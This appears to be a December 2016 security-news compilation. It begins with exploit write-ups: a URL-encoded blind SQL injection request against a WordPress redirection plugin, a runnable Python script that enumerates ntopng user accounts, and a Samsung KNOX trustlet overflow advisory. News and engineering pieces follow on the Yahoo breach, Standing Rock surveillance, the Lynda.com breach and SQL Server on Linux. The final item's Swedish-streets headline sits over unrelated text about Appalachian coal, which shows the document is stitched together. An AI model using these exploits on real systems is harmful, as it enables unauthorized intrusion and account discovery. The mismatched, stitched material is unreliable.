WordPress 404 1.0 SQL Injection

# Exploit Title: Unauthenticated SQL injection in the 404 plugin for WordPress v1.0
# Google Dork: N/A
# Date: 17/12/2016
# Exploit Author: Ahmed Sherif (Deloitte)
# Vendor Homepage: N/A
# Software Link: https://wordpress.org/plugins/404-redirection-manager/
# Version: V1.0
# Tested on: Linux Mint
# CVE : N/A

The plugin does not properly sanitize user input and is therefore
vulnerable to SQL injection.

The vulnerable code is in custom/lib/cf.SR_redirect_manager.class.php on line 356.

[#] Proof of Concept (PoC):

GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp-settings-time-1=1480877693
Connection: close
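Decoded, the PoC path is easier to read. The snippet below (Python 3, used here only for illustration) URL-decodes the payload to show the time-based blind injection that reaches the database: the server sleeps five seconds when the injected condition holds, so response delay reveals whether the condition is true.

```python
from urllib.parse import unquote

# URL-decode the PoC path from the request above. SLEEP(5-(IF(cond,0,5)))
# sleeps 5 seconds when cond is true and 0 seconds when it is false,
# letting an attacker infer query results from response timing alone.
payload = ("%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-"
           "%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20"
           "%28%27SQL%27%3D%27SQL")
print(unquote(payload))
```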

ntopng 2.5.160805 Username Enumeration

# Exploit title: ntopng user enumeration
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 04-08-2016
# Vendor homepage: ntop.org
# Software version: v.2.5.160805

import os
import sys
import urllib
import urllib2
import cookielib

server = 'ip.add.re.ss'
username = 'ntopng-user'
password = 'ntopng-password'
timeout = 6

if len(sys.argv) < 2:
    print "usage: %s" % sys.argv[0]
    sys.exit(1)

if not os.path.isfile(sys.argv[1]):
    print "%s doesn't exist" % sys.argv[1]
    sys.exit(1)

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'user': username, 'password': password,
                               'referer': '/authorize.html'})
opener.open('http://' + server + ':3000/authorize.html', login_data, timeout)

print "\nEnumerating ntopng...\n"
with open(sys.argv[1]) as f:
    for user in f:
        user = user.strip()
        url = ('http://%s:3000/lua/admin/validate_new_user.lua'
               '?user=%s&networks=,::/0' % (server, user))
        try:
            resp = opener.open(url)
            if "existing" not in resp.read():
                print "[NOT FOUND] %s" % user
            else:
                print "[FOUND] %s" % user
        except Exception as e:
            print e

Samsung Devices KNOX Extensions OTP TrustZone Trustlet Stack Buffer Overflow

As a part of the KNOX extensions available on Samsung devices, Samsung provides a TrustZone trustlet which allows the generation of OTP tokens. The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e), which can be communicated with using the "OTP" service, published by "otp_server". Many of the internal commands supported by the trustlet must either unwrap or wrap a token. They do so by calling the functions "otp_unwrap" and "otp_wrap", respectively. Both functions copy the internal token data to a local stack-based buffer before attempting to wrap or unwrap it. However, this copy operation is performed using a length field supplied in the user's buffer (the length field's offset changes according to the calling code-path), which is not validated at all. This means an attacker can supply a length field larger than the stack-based buffer, causing the user-controlled token data to overflow the stack buffer. There is no stack cookie mitigation in MobiCore trustlets. On the device I'm working on (SM-G925V), the "OTP" service can be accessed from any user, including from the SELinux context "untrusted_app". Successfully exploiting this vulnerability should allow a user to elevate privileges to the TrustZone TEE.
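The missing bounds check can be modeled in a few lines. Everything below (buffer size, function name, signature) is a hypothetical sketch of the bug class, not the trustlet's actual code:

```python
# Python model of the trustlet's flaw; the buffer size and names here are
# invented for illustration, not taken from the actual KNOX code.
STACK_BUF_SIZE = 0x100  # hypothetical fixed-size stack buffer

def copy_token(token_data, claimed_len, validate=True):
    """Copy claimed_len bytes of token data, as otp_wrap/otp_unwrap do.

    The real trustlet performs the copy with no bounds check (validate=False
    here); in C that smashes the stack, and MobiCore trustlets have no stack
    cookies to catch it. The check below is what was missing.
    """
    if validate and claimed_len > STACK_BUF_SIZE:
        raise ValueError("token length exceeds stack buffer")
    return token_data[:claimed_len]
```

With `validate=False` the model happily "copies" an oversized token; in the C trustlet that same copy overruns the fixed buffer with attacker-controlled data.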


Yahoo security problems a story of too little, too late | Reuters


Sun Dec 18, 2016 | 5:39 PM EST

By Joseph Menn, Jim Finkle and Dustin Volz | SAN FRANCISCO/BOSTON/WASHINGTON

In the summer of 2013, Yahoo Inc launched a project to better secure the passwords of its customers, abandoning the use of a discredited technology for encrypting data known as MD5.

It was too late. In August of that year, hackers got hold of more than a billion Yahoo accounts, stealing the poorly encrypted passwords and other information in the biggest data breach on record. Yahoo only recently uncovered the hack and disclosed it last week.

The timing of the attack might seem like bad luck, but the weakness of MD5 had been known by hackers and security experts for more than a decade. MD5 can be cracked more easily than other so-called “hashing” algorithms, which are mathematical functions that convert data into seemingly random character strings.
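As a quick illustration of why MD5 is unsuitable for passwords (the password and guess list below are invented): unsalted MD5 hashes can be recomputed from candidate guesses almost instantly, so a leaked hash database amounts to an offline dictionary attack.

```python
import hashlib

# A leaked, unsalted MD5 password hash (made-up example password).
leaked = hashlib.md5(b"hunter2").hexdigest()

# Cracking is just re-hashing guesses and comparing; MD5 is fast enough
# that billions of guesses per second are feasible on commodity hardware.
for guess in (b"letmein", b"123456", b"hunter2"):
    if hashlib.md5(guess).hexdigest() == leaked:
        print("cracked: %s" % guess.decode())
```

Slow, salted hashing schemes (bcrypt, scrypt, PBKDF2) exist precisely to make this guess-and-compare loop expensive.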

In 2008, five years before Yahoo took action, Carnegie Mellon University’s Software Engineering Institute issued a public warning to security professionals through a U.S. government-funded vulnerability alert system: MD5 “should be considered cryptographically broken and unsuitable for further use.”

Yahoo’s failure to move away from MD5 in a timely fashion was an example of problems in Yahoo’s security operations as it grappled with business challenges, according to five former employees and some outside security experts. Stronger hashing technology would have made it more difficult for the hackers to get into customer accounts after breaching Yahoo’s network, making the attack far less damaging, they said.

“MD5 was considered dead long before 2013,” said David Kennedy, chief executive of cyber firm TrustedSec LLC. “Most companies were using more secure hashing algorithms by then.” He did not name specific firms.

Yahoo, which has confirmed it was still using MD5 at the time of the attack, disputed the notion that the company had skimped on security.

“Over the course of our more than 20-year history, Yahoo has focused on and invested in security programs and talent to protect our users,” Yahoo said in a statement to Reuters. “We have invested more than $250 million in security initiatives across the company since 2012.”


The former Yahoo security staffers, however, told Reuters the security team was at times turned down when it requested new tools and features such as strengthened cryptography protections, on the grounds that the requests would cost too much money, were too complicated, or were simply too low a priority.

Partly, that reflected the internet pioneer’s long-running financial struggles: Yahoo’s revenues and profits have fallen steadily since their 2008 peak while Alphabet Inc’s Google, Facebook Inc and others have come to dominate the consumer internet business.

“When business is good, it’s easy to do things like security,” said Jeremiah Grossman, who worked on Yahoo’s security team from 1999 to 2001. “When business is bad, you expect to see security get cut.”

To be sure, no system is completely hack-proof. Hackers have managed to break into passwords that were encrypted using more advanced technologies than MD5. Other Internet companies, such as LinkedIn and AOL, have also suffered security breaches, though none nearly as large as Yahoo’s.

“This could happen to any large corporation,” said Tom Kellermann, a former World Bank security manager and security industry executive.

Kellermann, now CEO of investment firm Strategic Cyber Ventures, said he was not surprised that it had taken Yahoo several years to identify the massive attacks. “Hackers often have a capacity to burrow deeper than we thought into a system and remain for years,” he said.

Reuters could not determine how many companies besides Yahoo were using MD5 in 2013. Google, Facebook and Microsoft Corp did not immediately respond to requests for comment.

According to another former security veteran at Yahoo, even when the company was growing quickly, security sometimes took a back seat as the company focused on system performance to keep up with the growth.

Then, when growth stalled, senior security staff left for other companies and the chances of getting approval for expensive upgrades dropped further, the person said.

“Any changes to the user database took forever because they were understaffed, and it’s an ultra-critical system – everything depends on it,” said the former Yahoo employee.

Yahoo declined to comment on details of its security practices, but said it routinely conducted drills to test and improve its cyber defenses and highlighted campaigns such as a “bug bounty” program in which it pays hackers to find security flaws and report them to the company.


Last September, Yahoo disclosed a 2014 cyber attack that affected at least 500 million customer accounts, the biggest known data breach at the time.

Following last week’s news of the even bigger 2013 breach, U.S. federal investigators and lawmakers said they are scrutinizing Yahoo’s security practices, and Verizon Communications Inc is seeking to renegotiate a July deal to buy Yahoo’s internet business for $4.8 billion.

The former Yahoo employees said the company’s security problems began before the arrival of Chief Executive Marissa Mayer in 2012 and continued under her tenure. Yahoo had suffered attacks by Russian hackers for years, two of the former staffers said.

In 2014, Yahoo hired a new security chief, Alex Stamos, and one of the security crews he led – known internally as ‘The Paranoids’ – thought they were making headway against the hackers, former employees said. In 2015, when the security crew discovered a hidden program attached to Yahoo’s email servers that was monitoring all incoming messages, their first thought was that the Russian hackers had come back.

It turned out that the program had been installed by Yahoo’s email engineers to comply with a secret surveillance order requested by a U.S. intelligence agency, as Reuters previously reported. Stamos and some of his staff left Yahoo soon after that, creating further disruptions to security operations.

This week, in addition to disclosing the 2013 hack, Yahoo said someone had accessed its proprietary computer code to learn how to forge “cookies,” which would allow hackers to access an account without passwords. Yahoo said it connected some cookie-forging activity to the same state-sponsored actor it believed was responsible for the 2014 data theft.

“They burrowed in and got access to everything,” said Dan Guido, chief executive of cyber security firm Trail of Bits.

On Thursday, Germany’s cyber security authority criticized Yahoo for failing to adopt adequate encryption techniques and advised German consumers to switch to other email providers.

Yahoo told Reuters it was committed to keeping users secure by staying ahead of new threats. “Today’s security landscape is complex and ever-evolving, but, at Yahoo, we have a deep understanding of the threats facing our users and continuously strive to stay ahead of these threats to keep our users and our platforms secure.”

(Reporting by Joseph Menn in San Francisco, Jim Finkle in Boston and Dustin Volz in Washington; Editing by Jonathan Weber and Bill Rigby)

Investigating Law Enforcement’s Possible Use of Surveillance Technology at Standing Rock | Electronic Frontier Foundation


One of the biggest protests of 2016 is still underway at the Standing Rock Sioux Reservation in North Dakota, where Water Protectors and their allies are fighting Energy Transfer Partners’ plans to drill beneath contested Treaty land to finish the Dakota Access Pipeline. While the world has been watching law enforcement’s growing use of force to disrupt the protests, EFF has been tracking the effects of its surveillance technologies on water protectors’ communications and movement.

Following several reports of potentially unlawful surveillance, EFF sent technologists and lawyers to North Dakota to investigate. We collected anecdotal evidence from water protectors about suspicious cell phone behavior, including uncharacteristically fast battery drainage, applications freezing, and phones crashing completely. Some water protectors also saw suspicious login attempts to their Google accounts from IP addresses originating from North Dakota’s Information & Technology Department. On social media, many reported Facebook posts and messenger threads disappearing, as well as Facebook Live uploads failing to upload or, once uploaded, disappearing completely.

While some have attributed these issues to secret surveillance technologies like cell-site simulators (“CSSs,” also known colloquially as Stingrays) and malware, it’s been very difficult to pinpoint the true cause or causes.

To try to figure this out, EFF also sent more than 20 public records requests to federal, state and local law enforcement agencies that have been sighted at Standing Rock or are suspected of providing surveillance equipment to agencies on the ground. So far, only one federal agency – the US Marshals Service – has denied use of cell-site simulators, while the remaining federal agencies have yet to respond or have claimed their responsive documents are so numerous as to make production untenable and costly. Of the fifteen local and state agencies that have responded, thirteen deny having any record at all of cell-site simulator use, and two agencies—Morton County and the North Dakota State Highway Patrol (the two agencies most visible on the ground)—claim that they can’t release records in the interest of “public safety,” even though they fail to specify what public safety interest they seek to protect or how long they expect such an interest to outweigh the public’s right to know what they are doing at Standing Rock. Hennepin County, Minnesota—noted to both have access to CSSs and to have withdrawn officers and equipment from Standing Rock—has dodged our public records request by passing the buck to the Minnesota Department of Homeland Security and Emergency Management, which has yet to respond to our inquiry.

Law enforcement agencies should not be allowed to sidestep public inquiry into the surveillance technologies they’re using, especially when citizens’ constitutional rights are at stake. This across-the-board lack of transparency is a real barrier to the kind of independent assessment and testing necessary to understand what technologies are being deployed on the ground, and by whom. For example, a benign variable like overloaded rural cell networks may be to blame for some of the connectivity problems water protectors have experienced. However, we can’t discount the possibility of interference caused by law enforcement’s use of surveillance technology against domestic activists without knowing what technologies are being used, where, when, how, why, and by whom. We need greater law enforcement transparency, deeper levels of investigation and public oversight, and continued independent testing on the ground.

We’re continuing to collect incident reports from water protectors on the ground, and we’re keeping an eye out for any signs of cell-site simulator use. If you’re at Standing Rock, here’s a list of potential signs to look out for:

1. Apparent connectivity, but unable to transmit/receive, or unusual delay in calls/texts (bars, but service not normal)

2. Unexpected loss of mobile signal (no bars)

3. Sudden mobile phone battery draining

4. Unexpected downgrading of cellular network (4G to 3G, 3G to 2G, etc.)

5. IMSI catcher evidence as detected by software (e.g. AIMSICD, SnoopSnitch)

If you directly witness digital communication interference while at Standing Rock that you’d like to report, please let us know here.

It is past time for the Department of Justice to investigate the scope of law enforcement’s digital surveillance at Standing Rock and its consequences for civil liberties and freedoms in the digital world. The government has a choice: if it will not be transparent enough to allow the public to police it, then it must police itself. However, if the agencies charged with serving and protecting Americans are in fact persecuting and threatening our civil rights, then they must be held accountable and stopped from violating the very rights they were created to defend.

LinkedIn’s training arm resets 55,000 members’ passwords • The Register

Lynda.com database accessed by ‘unauthorized third party’

Lynda.com, the training arm of LinkedIn, on Saturday issued email notices to about 55,000 members whose data it says has been accessed by an “unauthorized third party.”

The letter sent to members, two of whom thoughtfully forwarded it to El Reg, reads as follows:

We recently became aware that an unauthorized third party breached a database that included some of your Lynda​.com learning data, such as contact information and courses viewed. We are informing you of this issue out of an abundance of caution.

Please know that we have no evidence that this data included your password. And while we have no evidence that your specific account was accessed or that any data has been made publicly available, ​we wanted to notify you as a precautionary measure.

The Register asked LinkedIn when the breach was detected, when it occurred, and how many people were impacted.

The company offered a statement penned by an unnamed spokesperson, restating news of the breach and offering the following:

As a precautionary measure, we reset passwords for the less than 55,000 Lynda.com users affected and are notifying them of the issue. We’re also working to notify approximately 9.5 million Lynda.com users who had learner data, but no protected password information, in the database. We have no evidence that any of this data has been made publicly available and we have taken additional steps to secure Lynda.com accounts.

LinkedIn has form when it comes to breaches: earlier this year the company downplayed the sale of 117m user records, a trivial number compared to the billion user records Yahoo! last week admitted it had lost, probably as a result of management fearing a costly and complex encryption re-tooling effort. ®


SQL Server on Linux: How? Introduction | SQL Server Blog

This post was authored by Scott Konersmann, Partner Engineering Manager, SQL Server, Slava Oks, Partner Group Engineering Manager, SQL Server, and Tobias Ternstrom, Principal Program Manager, SQL Server


We first announced SQL Server on Linux in March, and recently released the first public preview of SQL Server on Linux (SQL Server v.Next CTP1) at the Microsoft Connect(); conference. We’ve been pleased to see the positive reaction from our customers and the community; in the two weeks following the release, there were more than 21,000 downloads of the preview. A lot of you are curious to hear more about how we made SQL Server run on Linux (and some of you have already figured out and posted interesting articles about part of the story with “Drawbridge”). We decided to kick off a blog series to share technical details about this very topic, starting with an introduction to the journey of offering SQL Server on Linux. Hopefully you will find it as interesting as we do!


Making SQL Server run on Linux involves introducing what is known as a Platform Abstraction Layer (“PAL”) into SQL Server. This layer is used to align all operating system or platform specific code in one place and allow the rest of the codebase to stay operating system agnostic. Because of SQL Server’s long history on a single operating system, Windows, it never needed a PAL. In fact, the SQL Server database engine codebase has many references to libraries that are popular on Windows to provide various functionality. In bringing SQL Server to Linux, we set strict requirements for ourselves to bring the full functional, performance, and scale value of the SQL Server RDBMS to Linux. This includes the ability for an application that works great against SQL Server on Windows to work equally great against SQL Server on Linux. Given these requirements, and the fact that the existing SQL Server OS dependencies would make it very hard to provide a highly capable version of SQL Server outside of Windows in a reasonable time, it was decided to marry parts of the Microsoft Research (MSR) project Drawbridge with SQL Server’s existing platform layer, the SQL Server Operating System (SOS), to create what we call the SQLPAL. The Drawbridge project provided an abstraction between the underlying operating system and the application for the purposes of secure containers, and SOS provided robust memory management, thread scheduling, and IO services. Creating SQLPAL enabled the existing Windows dependencies to be used on Linux, with the parts of the Drawbridge design focused on OS abstraction combined with the key OS services left to SOS. We are also changing the SQL Server database engine code to bypass the Windows libraries and call directly into SQLPAL for resource-intensive functionality.

Requirements for supporting Linux

SQL Server is Microsoft’s flagship database product, with close to 30 years of development behind it. At a high level, the list below represents our requirements as we designed the solution to make the SQL Server RDBMS available on multiple platforms:

  1. Quality and security must meet the same high bar we set for SQL Server on Windows
  2. Provide the same value, both in terms of functionality, performance, and scale
  3. Application compatibility between SQL Server on Windows and Linux
  4. Enable a continued fast pace of innovation in the SQL Server code base and make sure new features and fixes appear immediately across platforms
  5. Put in place a foundation for future SQL Server suite services (such as Integration Services) to come to Linux

To make SQL Server support multiple platforms, the engineering task is essentially to remove or abstract away its dependencies on Windows. As you can imagine, after decades of development against a single operating system, there are plenty of OS-specific dependencies across the code base. In addition, the code base is huge. There are tens of millions of lines of code in SQL Server.
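The idea of a PAL can be sketched in miniature. The interface and class names below are invented for illustration, not SQL Server's actual APIs: all platform-specific behavior sits behind one small interface, and the engine codes only against that interface.

```python
import abc
import platform

# Toy illustration of a platform abstraction layer (all names invented):
# the engine calls only HostABI, and exactly one backend per OS touches
# platform specifics, keeping the rest of the codebase OS-agnostic.
class HostABI(abc.ABC):
    @abc.abstractmethod
    def path_separator(self) -> str: ...

    @abc.abstractmethod
    def allocate(self, size: int) -> bytearray: ...

class LinuxHost(HostABI):
    def path_separator(self): return "/"
    def allocate(self, size): return bytearray(size)

class WindowsHost(HostABI):
    def path_separator(self): return "\\"
    def allocate(self, size): return bytearray(size)

def make_host() -> HostABI:
    # The only platform check in the program lives here, at the boundary.
    return WindowsHost() if platform.system() == "Windows" else LinuxHost()

engine_host = make_host()
print(engine_host.path_separator())
```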

SQL Server depends on various libraries and their functions and semantics commonly used in Windows development that fall into three categories:

  • “Win32” (e.g. user32.dll)
  • NT Kernel (ntdll.dll)
  • Windows application libraries (such as MSXML)

You can think of these as core library functions; most of them have nothing to do with the operating system kernel and only execute in user mode.

While SQL Server has dependencies on both Win32 and the Windows kernel, the most complex dependency is that of Windows application libraries that have been added over the years in order to provide new functionality.  Here are some examples:

  • SQL Server’s XML support uses MSXML to parse and process XML documents within SQL Server.
  • SQLCLR hosts the Common Language Runtime (CLR) for both system types and user-defined types, as well as CLR stored procedures.
  • SQL Server has some components written in COM, like the VDI interface for backups.
  • Heterogeneous distributed transactions are controlled through the Microsoft Distributed Transaction Coordinator (MS DTC).
  • SQL Server Agent integrates with many Windows subsystems (shell execution, Windows Event Log, SMTP mail, etc.).

These dependencies are the biggest challenge to overcome in meeting our goals of bringing the same value and achieving a very high level of compatibility between SQL Server on Windows and Linux. As an example, to re-implement something like SQLXML would take a significant amount of time, would run a high risk of not providing the same semantics as before, and could potentially break applications. The option of completely removing these dependencies would mean we must also remove the functionality they provide from SQL Server on Linux. If the dependencies were edge cases and impacted only a very few customer-visible features, we could have considered it. As it turns out, removing them would force us to remove tons of features from SQL Server on Linux, which would go against our goals around compatibility and value across operating systems.

We could take the approach of doing this re-implementation piecemeal, bringing value little by little. While this would be possible, it would also go against the requirements because it would mean that there would be a significant gap between SQL Server on Linux and Windows for years. The resolution lies in the right platform abstraction layer.

Building a PAL

Software that is supported across multiple operating systems always has an implementation of some sort of Platform Abstraction Layer (PAL). The PAL layer is responsible for abstraction of the calls and semantics of the underlying operating system and its libraries from the software itself. The next couple of sections consider some of the technology that we investigated as solutions to building a PAL for SQL Server.

SQL Operating System (SOS or SQLOS)

In the SQL Server 2005 release, a platform layer was created between the SQL Server engine and Windows called the SQL Operating System (SOS). This layer was responsible for user mode thread scheduling, memory management, and synchronization (see SQLOS for reference).  A key reason for the creation of SOS was that it allowed for a centralized set of low level management and diagnostics functionality to be provided to customers and support (subset of Dynamic Management Views/DMVs and Extended Events/XEvents).  This layer allowed us to minimize the number of system calls involved in scheduling execution by running non-preemptively and letting SQL Server do its own resource management.  While SOS improved performance and greatly helped supportability and debugging, it did not provide a proper abstraction layer from the OS dependencies described above, i.e. Windows semantics were carried through SOS and exposed to the database engine.
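The non-preemptive idea behind SOS can be modeled with generator-based tasks. This is a toy sketch of the concept only, not SQLOS code: tasks run until they voluntarily yield, so the engine, not the OS, decides when to switch, and far fewer system calls are involved in scheduling.

```python
from collections import deque

# Toy cooperative (non-preemptive) scheduler in the spirit of SQLOS:
# each task runs until it voluntarily yields, and the scheduler simply
# requeues it. No OS preemption or system call is involved per switch.
def run_cooperative(tasks):
    ready = deque(tasks)
    trace = []
    while ready:
        task = ready.popleft()
        try:
            trace.append(next(task))  # run until the task yields
            ready.append(task)        # requeue it behind the others
        except StopIteration:
            pass                      # task completed; drop it
    return trace

def worker(name, steps):
    for i in range(steps):
        yield "%s:%d" % (name, i)

# Two workers interleave deterministically at their yield points.
print(run_cooperative([worker("A", 2), worker("B", 2)]))
```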


In the scenario where we would completely remove the dependencies on the underlying operating system from the database engine, the best option was to grow SOS into a proper Platform Abstraction Layer (PAL).  All the calls to Windows APIs would be routed through a new set of equivalent APIs in SOS and a new host extension layer would be added on the bottom of SOS that would interact with the operating system. While this would resolve the system call dependencies, it would not help with the dependencies on the higher-level libraries.


Drawbridge

Drawbridge was a Microsoft Research project (see Drawbridge for reference) that focused on drastically reducing the virtualization resource overhead incurred when hosting many virtual machines on the same hardware.  The research involved two ideas.  The first idea was a “picoprocess,” which consists of an empty address space, a monitor process that interacts with the host operating system on behalf of the picoprocess, and a kernel driver that populates the address space at startup and implements a host Application Binary Interface (ABI) allowing the picoprocess to interact with the host.  The second idea was a user mode Library OS, sometimes referred to as LibOS.  Drawbridge provided a working Windows Library OS that could be used to run Windows programs on a Windows host.  This Library OS implements a subset of the 1500+ Win32 and NT ABIs and stubs the rest to either succeed or fail depending on the type of call.


Our needs didn’t align with the original goals of the Drawbridge research.  For instance, the picoprocess idea isn’t something needed for moving SQL Server to other platforms.  However, there were a couple of synergies that stood out:

  1. Library OS implemented most of the 1500+ Windows ABIs in user mode and only 45-50 ABIs were needed to interact with the host.  These ABIs were for address space and memory management, host synchronization, and IO (network and disk).  This made for a very small surface area that needs to be implemented to interact with a host.  That is extremely attractive from a platform abstraction perspective.
  2. Library OS was capable of hosting other Windows components.  Enough of the Win32 and NT layers were implemented to host CLR, MSXML, and other APIs that the SQL suite depends on. This meant that we could get more functionality to work without rewriting whole features.

There were also some risk and reward tradeoffs:

  1. The Microsoft Research project was complete and there was no support for Drawbridge. Therefore, we needed to take a source snapshot and modify the code for our purposes.  The risks were around the costs to ramp up a team on the Library OS, modify it to be suitable for SQL Server, and make it perform comparably with Windows.  On the positive side, this would mean everything is in user mode and we would own all the code within the stack.  Performance critical code can be optimized because we can modify all layers of the stack including SQL Server, the Library OS, and the host interface as needed to make SQL Server perform.  Since there are no real boundaries in the process, it is possible for SQL Server to call Linux.
  2. The original Drawbridge project was built on Windows and used a kernel driver and monitor process.  This would need to be dropped in favor of a user mode only architecture.  In the new architecture, the host extension (referred to as PAL in the Drawbridge design) on Windows would move from a kernel driver to just a user mode program.  Interestingly enough, one of the researchers had developed a rough prototype for Linux that proved it could be done.
  3. Because the technologies were created independently there was a large amount of overlapping functionality.  SOS had subsystems for object management, memory management, threading/scheduling, synchronization, and IO (disk and network). The Library OS and Host Extension also had similar functionality.  These systems would need to be rationalized down to a single implementation.


[Table flattened in extraction: SOS, the Library OS, and the Host Extension each had their own overlapping subsystems for object management, memory management, threading/scheduling, synchronization, and I/O (disk, network).]


As a result of the investigation, we decided on a hybrid strategy.  We would merge SOS and Library OS from Drawbridge to create the SQL PAL (SQL Platform Abstraction Layer). For areas of Library OS that SQL Server does not need, we would remove them. To merge these architectures, changes were needed in all layers of the stack.

The new architecture consists of a set of SOS direct APIs which don’t go through any Win32 or NT syscalls.  Code without SOS direct APIs will go through either a hosted Windows API (like MSXML) or NTUM (NT User Mode API – the 1500+ Win32 and NT syscalls). All the subsystems like storage, network, or resource management will be based on SOS and will be shared between the SOS direct and NTUM APIs.


This architecture provides some interesting characteristics:

  • Everything running in process boils down to the same platform assembly code.  The CPU can’t tell the difference between the code that is providing Win32 functionality to SQL Server or native Linux code.
  • Even though the architecture shows layering, there are no real boundaries within the process (There is no spoon!).  If code running in SQL Server which is performance critical needs to call Linux, it can do that directly with a very small amount of assembler via the SOS direct APIs to set up the stack correctly and process the result.  An example where this has been done is the disk IO path.  There is a small amount of conversion code left to convert from the Windows scatter/gather input structure to the Linux vectored IO structure.  Other disk IO types don’t require any conversions or allocations.
  • All resources in the process can be managed by SQLPAL.  In SQL Server, before SQLPAL, most resources such as memory and threads were controlled, but there were some things outside its control.  Some libraries and Win32/NT APIs would create threads on their own and do memory allocations without using the SOS APIs.  With this new architecture, even the Win32 and NT APIs would be based on SQLPAL, so every memory allocation and thread would be controlled by SQLPAL. As you can see, this also benefits SQL Server on Windows.
  • For SQL Server on Linux we are using about 81 MB of uncompressed Windows libraries, so it’s a tiny fraction (less than 1%) of a typical Windows installation. SQLPAL itself is currently around 8 MB.
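As a rough illustration of the disk IO path described above, a Windows-style scatter/gather segment list maps almost one-to-one onto Linux vectored IO. This is a minimal sketch under stated assumptions: the `SegmentElement` structure and `read_segments` function are hypothetical stand-ins for SQLPAL's internal types, which are not public.

```c
/* Minimal sketch: translating a Windows-style scatter/gather segment
 * list into a Linux iovec array and issuing a single vectored read.
 * SegmentElement is a hypothetical stand-in, not an actual SQLPAL type. */
#define _GNU_SOURCE
#include <stdlib.h>
#include <sys/uio.h>

/* Hypothetical Windows-style segment: one buffer per entry. */
typedef struct {
    void  *buffer;
    size_t length;
} SegmentElement;

/* Build an iovec array from the segment list, then do one preadv() call. */
ssize_t read_segments(int fd, const SegmentElement *segs, int nsegs,
                      off_t offset)
{
    struct iovec *iov = calloc((size_t)nsegs, sizeof(*iov));
    if (!iov)
        return -1;
    for (int i = 0; i < nsegs; i++) {
        iov[i].iov_base = segs[i].buffer;  /* same buffer, new wrapper */
        iov[i].iov_len  = segs[i].length;
    }
    ssize_t n = preadv(fd, iov, nsegs, offset);
    free(iov);
    return n;
}
```

The conversion is a field-by-field copy with no data movement, which is why the post can say other disk IO types need no conversions or allocations at all.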

Process Model

The following diagram shows what the address space looks like when running.  The host extension is simply a native Linux application.  When the host extension starts, it loads and initializes SQLPAL; SQLPAL then brings up SQL Server.  SQLPAL can launch software-isolated processes, which are simply collections of threads and allocations running within the same address space.  We use this for things like SQLDumper, an application that runs when SQL Server encounters a problem, to collect an enlightened crash dump.
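Conceptually, the bootstrap sequence above is an ordinary dynamic-loading pattern: a small native program resolves an entry point in a shared library and hands over control. The sketch below shows that pattern in generic form; the library name `libsqlpal.so` and symbol `pal_init` in the comment are purely illustrative, since the actual SQLPAL binary interface is not public.

```c
/* Generic loader in the style of a host extension: resolve an entry
 * point in a shared library so control can be handed to it. */
#include <dlfcn.h>
#include <stdio.h>

/* Returns the resolved symbol, or NULL with an error report. */
void *load_entry(const char *libpath, const char *symbol)
{
    void *lib = dlopen(libpath, RTLD_NOW | RTLD_LOCAL);
    if (!lib) {
        fprintf(stderr, "dlopen: %s\n", dlerror());
        return NULL;
    }
    void *fn = dlsym(lib, symbol);
    if (!fn)
        fprintf(stderr, "dlsym: %s\n", dlerror());
    return fn;
}

/* A hypothetical host extension would then do something like:
 *
 *   int (*pal_init)(int, char **) =
 *       (int (*)(int, char **))load_entry("./libsqlpal.so", "pal_init");
 *   return pal_init(argc, argv);   // PAL takes over, starts SQL Server
 */
```

The point of the pattern is that the host process stays trivially small: everything interesting lives in the loaded library, which matches the post's description of the host extension as "simply a native Linux application".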

One point to reiterate is that even though this might look like a lot of layers there aren’t any hard boundaries between SQL Server and the host.


Evolution of SQLPAL

At the start of the project, SQL Server was built on SOS and Library OS was independent.  The eventual goal is to have a merged SOS and Library OS as the core of SQL PAL.  For public preview, this merge wasn’t fully completed, but the heart of SQLPAL had been replaced with SOS.  For example, threads and memory already use SOS functionality instead of the original Drawbridge implementations.

The result is that there are two instances of SOS running inside the CTP1 release: one in SQL Server and one in SQLPAL.  This works fine because the SOS instance in SQL Server is still using Win32 APIs, which call down into SQLPAL.  The SQLPAL instance of the SOS code has been changed to call the host extension ABIs (i.e., the native Linux code) instead of Win32.

Now we are working on removing the SOS instance from SQL Server.  We are exposing the SOS APIs from the SQLPAL.  Once this is completed everything will flow through the single SQLPAL SOS instance.

More posts

We are planning more of these posts to tell you about our journey, which we believe has been amazing and a ton of fun worth sharing. Please leave comments if there are specific areas you would like us to cover!


How Sweden Has Redesigned Streets To Route Around Bad Human Behavior


In the heart of Appalachia, in places like West Virginia and eastern Kentucky, life has long been built around coal, figuratively and literally. In the early 20th century, coal companies founded towns in the rugged and steep interiors of West Virginia to hold their workforces. But coal—and the traditional idea of coal country with it—is dying. Markets have embraced cheaper or cleaner alternatives. Natural gas has surpassed coal as the country’s largest source of net electricity generation. Renewables are projected to increase by 72% by 2040. After years of coal booms and busts, “this is final,” says Gwendolyn Christon, the owner of the IGA grocery store in Isom, Kentucky, and one of the many locals we spoke to in a trip across the region to document the future of coal country. “If we’re gonna stay here and prosper, we have to start looking for other ways of making a living. You have to do that quickly and not just sit back and wait for something to happen. It’s not going to depend on the federal government or someone coming in to rescue us. It’s going to be us going to work and doing it ourselves.” 

